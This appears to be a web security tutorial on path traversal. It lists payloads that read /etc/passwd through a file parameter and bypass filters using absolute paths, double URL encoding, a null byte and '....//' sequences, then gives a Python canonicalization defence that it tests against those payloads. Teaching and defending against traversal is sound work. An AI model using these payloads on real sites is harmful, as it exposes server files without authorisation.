Path traversal vulnerabilities are easy to find on vulnerable websites, and they let an attacker read the contents of files on the server, including the passwd file, configuration files, database files, and so on.
Before looking at the path traversal vulnerability itself, let's first understand what a “path” is in web terms.
As the image above shows, the path that follows the domain (or top-level domain) tells the server which file to serve to the client.
Now, by changing the path in the URL, we can access different files stored on the server.
Assume we have a website that serves the file cats.png to the client:
https://www.example.com/images?file=cats.png
Now, if the website is running on a Linux system, the actual path of cats.png would typically be as given below:
/var/www/images/cats.png
To access the sensitive file “/etc/passwd”, we have to go back three directories and then append “/etc/passwd” in the URL:
Original url: https://www.example.com/images?file=cats.png
Updated url: https://www.example.com/images?file=../../../etc/passwd
This will show the contents of the /etc/passwd file, which stores the users' details.
To prevent this kind of attack, websites use various filters, but there are still ways to bypass those filters. Some techniques are shown below:
Try the absolute path of the file instead of the relative path:
Try this: https://www.example.com/images?file=/etc/passwd
Instead of this: https://www.example.com/images?file=../../../etc/passwd
Absolute path: /etc/passwd
Relative path: ../../../etc/passwd
Sometimes the server removes the “../” sequence from the URL, but you can use single URL encoding or even double URL encoding.
URL: https://www.example.com/images?file=../../etc/passwd
single url encoded: https://www.example.com/images?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd
double url encoded: https://www.example.com/images?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd
single encoding of ../ = %2e%2e%2f
double encoding of ../ = %252e%252e%252f
Sometimes the server's filter requires a specific directory to be present in the URL before it accepts the path.
URL: https://www.example.com/images?file=/var/www/images/cats.png
Here, the /var/www/images/ directory must be present in the URL. In such a case,
Try this: https://www.example.com/images?file=/var/www/images/../../../etc/passwd
The server may filter on the file's extension so that users can't read sensitive data from other files, but you can bypass it using a “null byte”.
URL: https://www.example.com/images?file=cats.png
Here, .png must be present in the URL. In such a case,
Try this: https://www.example.com/images?file=../../../etc/passwd%00.png
Here, “%00” is a URL-encoded null byte, which tells the server to ignore the rest of the URL after %00, since the null byte marks the end of the string.
The web server may strip the ../ string from the URL, but you can use ....// or ....\/ in the URL. Even if the server strips ../ from the URL, the characters that remain still form another ../.
URL: https://www.example.com/images?file=....//....//....//etc/passwd
The server strips ../ from the URL. Each ....// is ..[../]/, so removing the bracketed ../ leaves ../.
After stripping, the URL will look like this:
https://www.example.com/images?file=../../../etc/passwd
Canonicalization resolves the .. segments before a path is compared or used, for example:
absolute path: \var\www\images\..\images\cats.png
canonical path: \var\www\images\cats.png
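As an added example (not code from the original post), here is a Python handler for the ?file= parameter that resists every bypass listed above by canonicalizing the path and checking containment, instead of stripping patterns from the input. The root /var/www/images, the function name and the sample inputs are assumptions taken from the post's own examples.

```python
import os
from urllib.parse import unquote

# Assumed document root for the ?file= parameter (matches the post's /var/www/images layout).
IMAGE_ROOT = "/var/www/images"


def resolve_image_path(requested: str, root: str = IMAGE_ROOT):
    """Map a ?file= value to a file under root; return None when it escapes the root."""
    # Decode percent-encoding exactly once, as the web framework would. A double-encoded
    # %252e%252e%252f therefore stays the literal text "%2e%2e%2f" and never becomes "../".
    name = unquote(requested)
    # A null byte truncates the path in C-based file APIs (the %00.png trick), so reject it outright.
    if "\x00" in name:
        return None
    root_real = os.path.realpath(root)
    # os.path.join discards root when name is absolute, so "/etc/passwd" and
    # "/var/www/images/../../../etc/passwd" are both judged by where they really land.
    candidate = os.path.realpath(os.path.join(root_real, name))
    # realpath collapses "..", "." and symlinks; "....//" is left alone because "...."
    # is just an ordinary (non-existent) directory name, not a traversal sequence.
    # Containment check: the resolved file must be the root itself or a descendant of it.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


if __name__ == "__main__":
    # The post's own payloads plus the legitimate request, as constructed sample input.
    samples = [
        "cats.png",
        "../../../etc/passwd",
        "/etc/passwd",
        "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
        "%252e%252e%252f%252e%252e%252fetc%252fpasswd",
        "/var/www/images/../../../etc/passwd",
        "../../../etc/passwd%00.png",
        "....//....//....//etc/passwd",
    ]
    for s in samples:
        print(f"{s!r:50} -> {resolve_image_path(s) or 'REJECTED'}")
```

Inputs that survive the check but name a directory such as "...." simply do not exist under the root and end as a 404, which is the intended outcome.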